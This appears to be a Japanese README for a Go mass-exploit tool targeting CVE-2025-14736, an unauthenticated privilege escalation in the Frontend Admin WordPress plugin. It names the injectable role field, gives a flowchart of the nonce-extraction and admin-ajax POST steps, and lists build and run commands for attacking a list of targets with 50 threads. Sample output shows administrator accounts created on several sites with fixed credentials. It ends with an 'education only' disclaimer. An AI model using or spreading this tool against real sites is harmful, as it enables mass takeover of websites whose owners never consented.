
ロールフォームフィールドを介した未認証の管理者への権限昇格
作者: Hyun Chiya
| フィールド | 値 |
|---|---|
| CVE ID | CVE-2025-14736 |
| プラグイン | DynamiApps 製 Frontend Admin |
| 影響を受けるバージョン | <= 3.28.25 |
| 脆弱性タイプ | 認証なし権限昇格 |
| 深刻度 | 緊急 |
WordPress 用 Frontend Admin プラグインは、登録時にユーザー制御フィールドの検証が不十分なため、認証なしの権限昇格に対して脆弱です。攻撃者はフォーム送信ペイロードを操作することで、administrator を含む任意のロールを注入できます。
脆弱なロジックは、ユーザーがそのロールを割り当てる権限を持っているかを検証せずに、role フィールドをユーザー入力から信頼しているフォーム送信の処理にあります。具体的には、acff[user][field_user_role_ID] フィールドを administrator に変更できます。
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fffgo build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| 引数 | 説明 |
|---|---|
-l | 対象 URL リストのパス(デフォルト: list.txt) |
-t | 同時実行スレッド数(デフォルト: 10) |
-timeout | リクエストのタイムアウト秒数(デフォルト: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
このツールは教育目的および許可されたセキュリティテストのみを目的として提供されています。コンピュータシステムへの不正アクセスは違法です。責任を持って使用してください。
Hyun Chiya